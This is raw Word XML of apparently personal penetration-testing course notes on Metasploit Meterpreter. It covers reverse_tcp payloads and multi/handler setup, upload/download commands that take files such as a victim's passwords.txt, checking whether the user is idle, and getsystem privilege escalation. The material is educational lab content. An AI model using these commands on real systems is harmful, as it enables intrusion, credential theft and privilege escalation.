      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For meterpreter, use a payload like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">windows/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for windows reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000050B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000050C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000050D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And the best thing about meterpreter is that you can upload and download between this and your local kali, so no need to set up python host and curl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000050E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000050F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">upload /path/to/local/file.txt C:\\Users\\victim\\Desktop\\file.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000510">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">upload shell.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000511">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(Uploads shell.ps1 to the current Meterpreter directory on the victim)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000512">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Download</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000513">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">download C:\\Users\\victim\\Desktop\\secrets.txt /home/kali/secrets.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000514">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">download C:\\Users\\victim\\Desktop\\passwords.txt</w:t>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1365"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tip:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000517">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1365"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Always use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">double backslashes</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> \\ or</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> single forward slashes</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> / in Windows paths.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000518">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1365"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Meterpreter handles both.</w:t>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t xml:space="preserve">Quick guide on how to use multi/handler:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000051C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="804"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000051D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="804"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set PAYLOAD windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000051E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="804"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This must match exactly what you used in msfvenom:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000051F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="804"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Set the LHOST and LPORT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="804"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Optional: Set session behavior</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000521">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="804"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want it to run without stopping after a session ends:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000522">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="804"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set ExitOnSession false</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000523">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="804"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">show advanced</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to look at the settings for this</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000524">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="804"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000525">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="804"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then execute the msfvenom executable on the target machine</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000526">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_sxzo87e2uium" w:id="40"/>
      <w:bookmarkEnd w:id="40"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000527">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_m3667ew8tz60" w:id="41"/>
      <w:bookmarkEnd w:id="41"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Core </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Meterpreter </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Post-Exploitation Features</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000528">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000529">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From XXXXXXXXX (21.3.1. Core Meterpreter Post-Exploitation Features)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000052A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000052B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">idletime:</w:t>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t xml:space="preserve">The first post-exploitation command we use is idletime. It displays the time for which a user has been idle. After obtaining basic information about the current user and operating system, this should be one of our first commands as it indicates if the target machine is currently in use or not.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000052E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3852863" cy="716237"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="29" name="image37.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image37.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId93"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3852863" cy="716237"/>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000530">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The output states that the user hasn't been interacting with the system for 9 minutes and 53 seconds, suggesting the user may have stepped away from their computer. If the result of the idletime command indicates that the user is away, we can take this as an opportunity to execute programs or commands which may display a command-line window such as CMD or PowerShell for a moment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000531">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000532">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">getsystem (automated privilege escalation):</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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For several post-exploitation features, we need administrative privileges to execute them. Metasploit contains the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">getsystem</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which attempts to automatically elevate our permissions to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NT AUTHORITY\SYSTEM</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. It uses various techniques using named pipe impersonation and token duplication. In the default settings, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">getsystem</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> uses all available techniques (shown in the help menu) attempting to leverage</w:t>
      </w:r>
      <w:hyperlink r:id="rId94">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId95">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SeImpersonatePrivilege</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:hyperlink r:id="rId96">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId97">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SeDebugPrivilege</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000535">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Before we execute </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">getsystem</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, let's start an interactive shell and confirm that our user has one of those two privileges assigned</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000536">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4189006" cy="2067651"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="550" name="image533.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image533.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId98"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4189006" cy="2067651"/>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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 60 shows that the user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">luiza</w:t>
      </w:r>
